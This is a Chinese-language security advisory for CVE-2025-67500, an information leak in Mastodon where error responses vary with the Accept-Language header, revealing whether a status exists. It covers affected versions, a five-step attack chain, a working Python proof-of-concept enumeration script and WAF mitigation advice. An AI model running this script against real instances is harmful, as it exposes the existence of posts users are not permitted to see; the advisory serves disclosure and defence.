CVE-2025-67500 Mastodon状态存在性枚举信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-67500

漏洞类型

信息泄露/枚举漏洞

CVSS评分

3.7 低危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Mastodon

漏洞概述

CVE-2025-67500是Mastodon社交网络服务器中的一个信息泄露漏洞。该漏洞存在于4.2.27及之前版本、4.3.0-beta.1至4.3.14版本、4.4.0-beta.1至4.4.9版本以及4.5.0-beta.1至4.5.2版本中。漏洞的根本原因在于错误处理机制存在差异，当用户发送带有非英语Accept-Language头的请求时，系统会返回不同的响应，从而允许攻击者推断特定状态(Status)是否存在。攻击者可以利用此漏洞确认他们无权查看的状态是否存在于系统中，但无法获取状态的具体内容或其他属性。此漏洞属于侧信道信息泄露，CVSS评分仅为3.7（低危），因为其影响范围有限，仅能泄露状态存在性这一单一信息。

技术细节

Mastodon是一个基于ActivityPub协议的开源去中心化社交网络服务器。该漏洞存在于其API的错误处理逻辑中。当攻击者尝试访问一个他们无权查看的特定状态(Status)时，系统会根据Accept-Language请求头的语言设置返回不同的HTTP响应。具体而言，使用非英语Accept-Language头（如fr-FR、de-DE等）时，系统可能返回404 Not Found错误，而使用英语Accept-Language头（如en-US）时可能返回403 Forbidden或其他错误。这种差异使得攻击者能够通过发送精心构造的请求并观察响应差异来枚举系统中是否存在特定的状态ID。攻击者需要事先知道目标状态的唯一标识符（如状态ID），然后通过对比不同语言设置下的响应来判断该状态是否存在于系统中。漏洞已在4.2.28、4.3.15、4.4.10和4.5.3版本中得到修复，修复方式为统一错误处理逻辑，确保无论使用何种语言设置，相同场景下返回一致的响应。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者获取目标用户在Mastodon实例上的状态(Status)标识符，可能通过观察公开时间线、提及或通过其他渠道获取状态ID

STEP 2

步骤2: 构造HTTP请求

攻击者构造针对/api/v1/statuses/{status_id}端点的GET请求，设置非英语Accept-Language头（如fr-FR、de-DE等）

STEP 3

步骤3: 发送探测请求

攻击者发送请求并观察HTTP响应状态码和响应体内容，漏洞会导致非英语语言设置下的响应与英语设置下的响应不同

STEP 4

步骤4: 响应差异分析

通过比较不同Accept-Language头下的响应差异（如404 vs 403），攻击者确认目标状态是否存在

STEP 5

步骤5: 枚举攻击

攻击者可以重复上述过程枚举多个状态ID，构建目标用户活动的敏感信息图谱

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-67500 PoC - Mastodon Status Existence Enumeration
# This vulnerability allows attackers to check if a status exists
# by sending requests with non-English Accept-Language headers

TARGET_URL = "https://mastodon.example.com/api/v1/statuses/"
STATUS_ID = "123456789"  # Replace with target status ID

def check_status_exists(status_id):
    """
    Check if a status exists by comparing responses with different Accept-Language headers
    """
    headers_english = {
        "Accept-Language": "en-US,en;q=0.9",
        "User-Agent": "Mozilla/5.0"
    }
    
    headers_non_english = {
        "Accept-Language": "fr-FR,fr;q=0.9",
        "User-Agent": "Mozilla/5.0"
    }
    
    try:
        # Send request with English Accept-Language
        resp_en = requests.get(
            f"{TARGET_URL}{status_id}",
            headers=headers_english,
            timeout=10
        )
        
        # Send request with non-English Accept-Language
        resp_non_en = requests.get(
            f"{TARGET_URL}{status_id}",
            headers=headers_non_english,
            timeout=10
        )
        
        # Compare responses
        if resp_en.status_code != resp_non_en.status_code:
            print(f"[+] Status {status_id} EXISTS (Response differs: EN={resp_en.status_code}, NON-EN={resp_non_en.status_code})")
            return True
        elif resp_en.status_code == 404 and resp_non_en.status_code == 404:
            print(f"[-] Status {status_id} does NOT exist")
            return False
        else:
            print(f"[?] Status {status_id} - Unable to determine (both returned {resp_en.status_code})")
            return None
            
    except requests.RequestException as e:
        print(f"[!] Request failed: {e}")
        return None

if __name__ == "__main__":
    print("CVE-2025-67500 PoC - Mastodon Status Enumeration")
    print("=" * 50)
    check_status_exists(STATUS_ID)

影响范围

Mastodon < 4.2.28

Mastodon 4.3.0-beta.1 - 4.3.14

Mastodon 4.4.0-beta.1 - 4.4.9

Mastodon 4.5.0-beta.1 - 4.5.2

防御指南

临时缓解措施

如果无法立即升级，可考虑在Web应用防火墙(WAF)层面配置规则，标准化不同Accept-Language头的错误响应，确保无论使用何种语言设置，相同场景下返回一致的HTTP状态码和错误信息。同时监控异常的非英语Accept-Language请求模式。